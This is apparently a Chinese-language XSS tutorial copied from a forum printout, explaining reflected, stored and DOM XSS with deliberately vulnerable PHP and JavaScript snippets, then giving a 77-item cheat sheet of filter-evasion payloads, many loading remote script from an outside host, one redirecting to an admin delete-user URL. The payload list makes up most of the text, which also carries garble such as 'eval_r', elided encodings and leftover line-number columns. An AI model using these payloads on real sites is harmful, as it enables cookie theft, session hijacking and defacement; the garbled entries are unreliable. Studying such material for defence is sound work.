一、什麼是XSS?
XSS全稱是Cross Site Scripting即跨站腳本,當目標網站目標用戶瀏覽器渲染HTML文檔的過程中,出現了不被預期的腳本指令並執行時,XSS就發生了。
這裏我們主要注意四點:1、目標網站目標用戶;2、瀏覽器;3、不被預期;4、腳本。
二、XSS有什麼危害?
當我們知道了什麼是XSS後,也一定很想知道它到底有什麼用,或者有什麼危害,如何防禦。
關於XSS有關危害,我這裏中羅列一段列表,詳細介紹不進行更多的贅述:
掛馬
盜取用戶Cookie。
DOS(拒絕服務)客戶端瀏覽器。
釣魚攻擊,高級的釣魚技巧。
刪除目標文章、惡意篡改數據、嫁禍。
劫持用戶Web行爲,甚至進一步滲透內網。
爆發Web2.0蠕蟲。
蠕蟲式的DDoS攻擊。
蠕蟲式掛馬攻擊、刷廣告、刷瀏量、破壞網上數據。。。
三、XSS分類
XSS有三類:反射型XSS(非持久型)、存儲型XSS(持久型)和DOM XSS。
1、反射型XSS
發出請求時,XSS代碼出現在URL中,作爲輸入提交到服務器端,服務器端解析後響應,XSS代碼隨響應內容一起傳回給瀏覽器,最後瀏覽器解析執行XSS代碼。這個過程像一次反射,故叫反射型XSS。
一個簡單的例子:
http://www.a.com/xss/reflect.php的代碼如下:
<?php
echo $_GET['x'];
?>- 1
- 2
- 3
- 4
- 5
- 1
- 2
- 3
- 4
- 5
如果輸入x的值未經任何過濾就直接輸出,提交:
http://www.foo.com/xss/reflect.php?x=
則alert()函數會在瀏覽器觸發。
2、存儲型XSS
存儲型XSS和反射型XSS的差別僅在於,提交的代碼會存儲在服務器端(數據庫,內存,文件系統等),下次請求目標頁面時不用再提交XSS代碼
最典型的例子是留言板XSS,用戶提交一條包含XSS代碼的留言存儲到數據庫,目標用戶查看留言板時,那些留言的內容會從數據庫查詢出來並顯示,瀏覽器發現有XSS代碼,就當做正常的HTML與Js解析執行,於是觸發了XSS攻擊。
3、DOM XSS
DOM XSS和反射型XSS、存儲型XSS的差別在於DOM XSS的代碼並不需要服務器參與,觸發XSS靠的是瀏覽器端的DOM解析,完全是客戶端的事情。
http://www.a.com/xss/domxss.html代碼如下:
<script>
eval(location.hash.substr(1));
</script>- 1
- 2
- 3
- 4
- 5
- 1
- 2
- 3
- 4
- 5
觸發方式爲:http://www.a.com/xss/domxss.html#alert(1)
這個URL#後的內容是不會發送到服務器端的,僅僅在客戶端被接收並解執行。
常見的輸入點有:
document.URL
document.URLUnencoded
document.location
document.referrer
window.location
window.name- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
xhr請求回來的數據
document.cookie- 1
- 1
表單項的值
常見的輸出點有:
直接輸出html內容,如:
document.write(…)
document.writeln(…)
document.body.innerHtml=…
直接修改DOM樹(包括DHTML)如:
document.forms[0].action…(以及其他集合,如:一些對象的src/href屬性等)
document.attachEvent(…)
document.create…(…)
document.execCommand(…)
document.body. …(直接通過body對象訪問DOM)
window.attachEvent(…)
替換document URL,如:
document.location=…(以及直接賦值給location的href,host,hostname屬性)
document.location.hostname=…
document.location.replace(…)
document.location.assign(…)
document.URL=…
window.navigate(…)
打開或修改新窗口,如:
document.open(…)
window.open(…)
window.location.href=…(以及直接賦值給location的href,host,hostname屬性)
直接執行腳本,如:
eval(…)
window.execScript(…)
window.setInterval(…)
window.setTimeout(…)
_____________________________附常見的XSS攻擊方法_________________________________
(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2)IMG標籤XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3)IMG標籤無分號無引號
<IMG SRC=javascript:alert(‘XSS’)>
(4)IMG標籤大小寫不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
(5)HTML編碼(必須有分號)
<IMG SRC=javascript:alert(“XSS”)>
(6)修正缺陷IMG標籤
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
(7)formCharCode標籤(計算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode編碼(計算器)
<IMG SRC=jav..省略..S')>
(9)7位的UTF-8的Unicode編碼是沒有分號的(計算器)
<IMG SRC=jav..省略..S')>
(10)十六進制編碼也是沒有分號(計算器)
<IMG SRC=java..省略..XSS')>
(11)嵌入式標籤,將Javascript分開
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(12)嵌入式編碼標籤,將Javascript分開
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(13)嵌入式換行符
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(14)嵌入式回車
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(15)嵌入式多行注入JavaScript,這是XSS極端的例子
<IMG SRC=”javascript:alert(‘XSS‘)”>
(16)解決限制字符(要求同頁面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
(18)空字符2,空字符在國內基本沒效果.因爲沒有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
(19)Spaces和meta前的IMG標籤
<IMG SRC=” javascript:alert(‘XSS’);”>
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
(23)雙開括號
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
(24)無結束腳本標記(僅火狐等瀏覽器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25)無結束腳本標記2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26)半開的HTML/JavaScript XSS
<IMG SRC=”javascript:alert(‘XSS’)”
(27)雙開角括號
<iframe src=http://3w.org/XSS.html <
(28)無單引號 雙引號 分號
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29)換碼過濾的JavaScript
\”;alert(‘XSS’);//
(30)結束Title標籤
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
(31)Input Image
<INPUT SRC=”javascript:alert(‘XSS’);”>
(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
(33)BODY標籤
<BODY(‘XSS’)>
(34)IMG Dynsrc
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
(35)IMG Lowsrc
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
(36)BGSOUND
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
(38)遠程樣式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
(40)IMG VBscript
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
(41)META鏈接url
<META HTTP-EQUIV=”refresh” CONTENT=”0;
URL=http://;URL=javascript:alert(‘XSS’);”>
(42)Iframe
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
(43)Frame
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6
(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
(45)TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
(46)DIV background-image
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(47)DIV background-image後加上額外字符(1-32&34&39&160&8192-
8&13&12288&65279)
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
(49)STYLE屬性分拆表達
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
(50)匿名STYLE(組成:開角號和一個字母開頭)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
(51)STYLE background-image
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
CLASS=XSS></A>
(52)IMG STYLE方式
exppression(alert(“XSS”))’>
(53)STYLE background
<STYLE><STYLE
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
(54)BASE
<BASE HREF=”javascript:alert(‘XSS’);//”>
(55)EMBED標籤,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
(56)在flash中使用ActionScrpt可以混進你XSS的代碼
a=”get”;
b=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);
(57)XML namespace.HTC文件必須和你的XSS載體在一臺服務器上
<HTML xmlns:xss>
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
<xss:xss>XSS</xss:xss>
</HTML>
(58)如果過濾了你的JS你可以在圖片裏添加JS代碼來利用
<SCRIPT SRC=””></SCRIPT>
(59)IMG嵌入式命令,可執行任意命令
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
(60)IMG嵌入式命令(a.jpg在同服務器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)繞符號過濾
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(62)
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(63)
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
(64)
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
(65)
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
(66)12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
(67)
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
</SCRIPT>
(68)URL繞行
<A HREF=”http://127.0.0.1/”>XSS</A>
(69)URL編碼
<A HREF=”http://3w.org”>XSS</A>
(70)IP十進制
<A HREF=”http://3232235521″>XSS</A>
(71)IP十六進制
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
(72)IP八進制
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
(73)混合編碼
<A HREF=”h
tt p://6 6.000146.0×7.147/”">XSS</A>
(74)節省[http:]
<A HREF=”//www.google.com/”>XSS</A>
(75)節省[www]
<A HREF=”http://google.com/”>XSS</A>
(76)絕對點絕對DNS
<A HREF=”http://www.google.com./”>XSS</A>
(77)javascript鏈接
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
- 153
- 154
- 155
- 156
- 157
- 158
- 159
- 160
- 161
- 162
- 163
- 164
- 165
- 166
- 167
- 168
- 169
- 170
- 171
- 172
- 173
- 174
- 175
- 176
- 177
- 178
- 179
- 180
- 181
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
- 153
- 154
- 155
- 156
- 157
- 158
- 159
- 160
- 161
- 162
- 163
- 164
- 165
- 166
- 167
- 168
- 169
- 170
- 171
- 172
- 173
- 174
- 175
- 176
- 177
- 178
- 179
- 180
- 181